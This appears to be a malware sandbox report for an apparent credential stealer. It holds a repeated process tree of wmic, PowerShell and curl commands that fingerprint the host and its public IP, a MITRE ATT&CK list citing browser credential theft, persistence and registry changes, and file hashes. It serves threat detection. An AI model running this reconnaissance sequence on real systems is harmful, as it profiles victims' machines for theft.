C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4236
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1728
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:5672
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5232
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2336
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:1984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:1764
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:888
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:4892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:1868
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:5952
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:6032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:5384
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2972
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:2280
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:4284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:972
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:5892
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:2240
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:4532
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:1508
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:4280
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:4524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:4068
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:5300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"2⤵PID:3640
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion3⤵PID:5600
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""2⤵PID:2568
-
C:\Windows\System32\Wbem\WMIC.exewmic MemoryChip get /format:list3⤵PID:4112
-
-
C:\Windows\system32\find.exefind /i "Speed"3⤵PID:5548
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"2⤵PID:2408
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
PID:4796
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"2⤵PID:1124
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName3⤵PID:6008
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"2⤵PID:6056
-
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke3⤵PID:2124
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Defense Evasion
- Hide Artifacts (1): Hidden Window (1)
- Modify Registry (2)
- Subvert Trust Controls (1): SIP and Trust Provider Hijacking (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (1): Credentials In Files (1)
Downloads
SHA512741a0078ea13278ef824ff0cf3dbc29710b62d62e03f24c2fb56d012e70841dbc160adea67b59c42a8b166b328382a02f4762218d3caf8828f9894ff05e9a025
-
Filesize
11KB
MD5c09ea00fed4bf0520c59cdba5e654e69
SHA1ae8420c460678f8b8472207d21fb5cc961257ca7
SHA256b16c51ad6922572aa76285a7eb85f9e87cc630a1edee0bd212d1df03e5a59f8e
SHA51277067c62ce93bc4043f69543ba408094c8580236fe57d7b696fea139b6e490f4c81c5def873d507abed132983cbf6df9d47d732a872b3f3c2359052ff8c3de48
-
Filesize
1KB
MD56cc0a34d75380a039c8a2d2821e13e86
SHA13880cdef9421ad3ec32c463585fe3898ce9d5ade
SHA2568942db45f7c5cf6be3abc9fe503a8bc485a720bb7a5838e6aebeb80f25f691d0
SHA512eb91b7fb2b9c68078715b1512a2105f3d92123cef1cf2bb6e9fff63c714363c521b4cb840354f2d9f3792a088b9cc623b69514f48096e919a552837a21b47fb1
-
Filesize
1KB
MD5321d57fccee188820bd2d061279ef76b
SHA18c5c83ffe3579529e091b79333adf3e67b18077e
SHA256d2a97bdb5fddb22462e56382db24e2e01aff52cde524d55b7b7617a53c607709
SHA512fd5b49c272dc22d5e2332ee6b0d5d88877ac96af3803a77e4b327d8884869fc68e1ed0a978660d149b85b19c5c09b39caba100db5087c4a50ce3820c7a66ffa5
-
Filesize
944B
MD539669e209b0ec52df5c516d4112178e9
SHA1006ef55f6f5912a60a823776fb2d3476f5df4986
SHA256b3b27bee0c324a6a84ecef0fe783eb73f9091528c6abffa6f3f836b4464856b1
SHA5122809f7f640088cdce83c1c54dfad4eae9e635b9c3feb8467bd7e5ee20da3b0d02d9f90c0c79f1d2a6e7752e582a2e0c46bc2646ab87d547e8ccbc420341a8920
-
Filesize
944B
MD54093e5ab3812960039eba1a814c2ffb0
SHA1b5e4a98a80be72fccd3cc910e93113d2febef298
SHA256c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c
SHA512f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b
-
Filesize
64B
MD5d5ed044e4f1e21179db39ad1fb6ca742
SHA13676af58ce6e48caa088d36a7837924f82a71d6e
SHA256e89e1b210c5f2851508e7dba182fc4be83655b67197200f413fdbe21be0ab951
SHA51297f9c523b46ec6dd02c20dd99c9313976f3b000231ceca724acf96be0f9075da0b72c91d415ee7e54118dca03c7bf0b97d986299656baa037a519ab7ad06df07
-
Filesize
64B
MD5446dd1cf97eaba21cf14d03aebc79f27
SHA136e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7
-
Filesize
1KB
MD58baa55f4c9614712ef2edb673b84f197
SHA1f95f528a8dbff1c7c8abbc320633ad0ec097c902
SHA256e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3
SHA512899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\777e9ec9-7c93-4570-a59a-3af16089ec03.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
2KB
MD53a4319f4c31d7a7124b5ce79395a6f24
SHA1face51cf7e0a0b8220084251bf686ee4c68058b7
SHA256e1af6bff2e0d7eaca0fa3498e2b23f4da02d6d2369c222f2534d186232fb7dbe
SHA5124aae8eb857e52119c36317ce60159bebc4fc6496bf6b16a0a8eac5bbcefca27070614edef8419aa81bf53acb5370e7487aaae0b7799e6631c2c82b2b980fc6fe
-
Filesize
1KB
MD524bf20c7da8cda980e104cecea6e811a
SHA1895b1ca9530597ec5671231aa2c69411b1e1d215
SHA25646d6cc7946062bc84acc79c7a6473afe6d4c6a0eb1db34c68f37ed873540013e
SHA512e267f8d782358d776ab4dad6c31d6fcdc7b39681443b3bb6da63977e6a8b2936fb441c4e4113eb2f34037bb779e17bb39593cf24a48cfb9a8ae02f0bb6cdbd95
-
Filesize
1KB
MD51100d83892f4910633efc703fbc81bfe
SHA121211280d3d4bf8010ccad600d837be03e48a014
SHA256539556057c52dd182667f3eea7ac6f3a231d1a1dba1e1d10c231133d10a651ab
SHA512e144ad975a43bb78af033cf8de8afbf2c4a346eab5db083c9cf2a52fc564b375bddc5759a1f700c5379149c79ba94237f66b87d6ae2766820c16d7e0cd8bf5f6
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
19KB
MD59c3beaa0d2614d9e6cc74cd8aa3fc742
SHA190f499d74fd2112409ef441bbd2da4950971d31e
SHA256e87b22799b18f247b0a89b49a120f4b22ee522458079c3cd0a898121acb14760
SHA51273a31e91034f46633aa9324bad7434962f88c890345f69a3032fa90327c35dbb706193e9d5e78f894ec7d08f2c798628ed2116f768b2949de1e53472d988d049
-
Filesize
518KB
MD5f2b1aed721fe827e3486af4471ed7d0a
SHA1216876197d4da080eff1f842871f36235ea31c59
SHA256fa096644e58f08983dc2a0f52852cbebcda052d74a7d2595c4531b0a4c86ffb3
SHA51252c426960baf3f7373f1c1a395476f13384ac577f24ec8e82bbf224342c54db3824a523e847d7e58eebbc34a0576499701b892e89c791b6029a02f55ea9f98cf
-
Filesize
3KB
MD5b833658801fbad7f04e700d2545bf541
SHA1e6a51620d1eb0242f256ff0a3096cda045f5b232
SHA2564bfd6bf062139a5ce455aee439fca2a7fca7779379445552e59b87a4d330dd05
SHA512e3131cc17c57f9e653bba92a0e9beccfb9719858fd0ed1c6709014b0b3eafa397c7d561e58e1d7d9df7f2e217ad4b36629c6f0e1f7c8c69cd29fc01bf46a8696
-
Filesize
3KB
MD5dc68c71403fb35455f2ec8757d03d299
SHA13a14f8d4a0cefe2d3bfa9073ba7822dac2053c9d
SHA256411bf004570ba42d74e01fc3d10aa79f095f5cdc6934b2f63082f56e0c70c679
SHA5122e520e5cb7584eff73c4e648dfb744f7dec3b31b40054c7470d4f310bb37553ba45fe33f954cfda0f16b4c6143e575477d44d25a005b8e18b8c14f0f2bdac680
-
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
Filesize1.8MB
MD566a65322c9d362a23cf3d3f7735d5430
SHA1ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA5120a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21
-
Filesize
37.6MB
MD57a89d2544714e445682d828b0f729b5f
SHA14c55c66ca16b17959a872d7179f0476f1622c9ec
SHA256636f647539bf6dc083ae7a41b5e9cb19337046e2297c289760a104452d5a7255
SHA512ce5d655254a7b605024cb3d3fa9a3ad2459174f4fe11d92637ccc3633ba7aeb3a471cb15d6d21dcda7c3fad5bc263c064fcbd9514c26fbd9a0d8c517036758d0
-
Filesize
26B
MD5fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98
-
Filesize
379B
MD518047e197c6820559730d01035b2955a
SHA1277179be54bba04c0863aebd496f53b129d47464
SHA256348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA5121942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877
-
Filesize
652B
MD592a4dc443a97ad574316e0a549a0cf5f
SHA1ba852dff28a91bdc44db4a428988c6811c18928f
SHA256cb78bb0231033a90db4ce0211e7286ff88f1ae33e00d513ae867ff9a2d774621
SHA5123568587690b62f9c28d2308dfae93afdeead67fec686204be7a565e76c1effd8152a01c5933238a0b2d7bd7f3324a924507d42eeeb4d5ccb329c1012df726e74
-
Filesize
426B
MD5b462a7b0998b386a2047c941506f7c1b
SHA161e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020
-
Filesize
369B
MD50e7c4010cfe49d314f8c16f50a9a5209
SHA1902709ff43d3ee8320f8981b232867cc5722400c
SHA2562e5d4e70ee8df06be8bdb2c2e98bdd1c2aeed3d61f35ac6b75ec0225452d4599
SHA5125a07d6ed360f8a8fedefc6ab0e6ba3c8af3122c42acd6409dd24ea609b7d9244b2b34615eaaa10e98ce53d6106644edc7bbe73c1f6ad8797894b166ab582a5dc
-
Filesize
652B
MD51256b9757e08db9a24ff8b1c3bde0bd9
SHA1a26f125c0b7d7e94579a5a3ffa05e6febbcdd436
SHA256e24a132e835a7972aab67fee93dd77197de84ca59dd35d43598f26f25b8f49da
SHA512df18bebb3a6bf88bf0f57a7ac419512505c04d7792937ff899cb979815248d4db7f459ba291ef63426a0cca17f5568a5ea688c5019259d55be85c6d0ecd6572b
-
Filesize
311B
MD57bc8de6ac8041186ed68c07205656943
SHA1673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA25636865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA5120495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba
-
Filesize
369B
MD538ed05083dcdf855ba993fc676307315
SHA194994ce1619ba3a42d435fd2fb68e20551acdb74
SHA256381fad8c2f64c9cb68b761f0210140a0d0c5ed19242bd3a7d412d46546240925
SHA51287bd817186f14db7d851de2e262c8d1f8f5734a205a53dae1cafd3b5c3595c5a9a5b616c4a9289defacabd194354c7e5bcdf1a0c97a678d252300c7ff0ee6718